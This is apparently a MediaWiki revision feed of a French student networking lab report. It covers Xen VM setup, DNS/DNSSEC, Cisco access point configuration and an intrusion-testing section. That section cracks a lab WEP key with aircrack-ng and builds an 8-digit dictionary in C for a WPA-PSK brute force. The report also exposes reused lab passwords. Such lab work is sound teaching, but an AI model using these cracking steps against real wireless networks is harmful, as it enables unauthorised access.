 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56409</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56409"/>
				<updated>2021-11-19T11:29:30Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire toad59.space.dnssec pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56408</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56408"/>
				<updated>2021-11-19T11:28:48Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
